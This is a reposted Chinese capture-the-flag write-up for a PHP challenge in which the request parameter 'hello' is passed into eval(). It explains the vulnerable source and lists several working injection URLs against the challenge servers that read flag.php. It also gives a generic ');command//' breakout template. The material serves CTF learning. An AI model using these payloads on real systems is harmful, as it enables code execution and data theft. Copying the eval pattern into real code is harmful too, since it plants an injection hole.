码迷,mamicode.com
首页 > 其他好文 > 详细

9.本地包含(这题可能出现了问题)

时间:2019-12-19 09:58:35      阅读:162      评论:0      收藏:0      [点我收藏+]

标签:strong   print   regexp   源码   include   nts   index   分析   wan   

题目源码如下

<?php
    include "flag.php";
    $a = @$_REQUEST[‘hello‘];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

1.分析$_REQUEST()函数

预定义的$_REQUEST变量包含了$_GET、$_POST以及$_COOKIE的内容。

$_REQUEST变量既可以使用GET也可以使用POST方式收集表单数据。所以

我们可以通过以get/post等方式赋值给$a,

2.分析eval()函数

字符串当作命令直接执行

3.分析var_dump() 

输出变量a的类型和值。

这道题就是让你读 flag.php 的内容, 传入的参数为 hello 用 eval 函数把传入的参数当成 php 代码执行, 所以直接传

方法一:尝试将flag.php文件直接输出

http://120.24.86.145:8003/?hello=1);print_r(file("./flag.php"));%23

方法二:直接对hello赋值

http://123.206.87.240:8003/?hello=file(‘flag.php‘)

http://123.206.87.240:8003/?hello=file_get_contents(‘flag.php‘)

http://123.206.87.240:8003/?hello=show_source(%27flag.php%27)
此外也可以
http://123.206.87.240:8003/index.php?hello=1);show_source(%27flag.php%27);//
 
);”:负责把前面的命令闭合掉

//”:把原来命令的残余部分注释掉

  所以格式形式为如下

);the_command_that_you_want_to_execute//

 


9.本地包含(这题可能出现了问题)

标签:strong   print   regexp   源码   include   nts   index   分析   wan   

原文地址:https://www.cnblogs.com/tqqnb/p/12065680.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!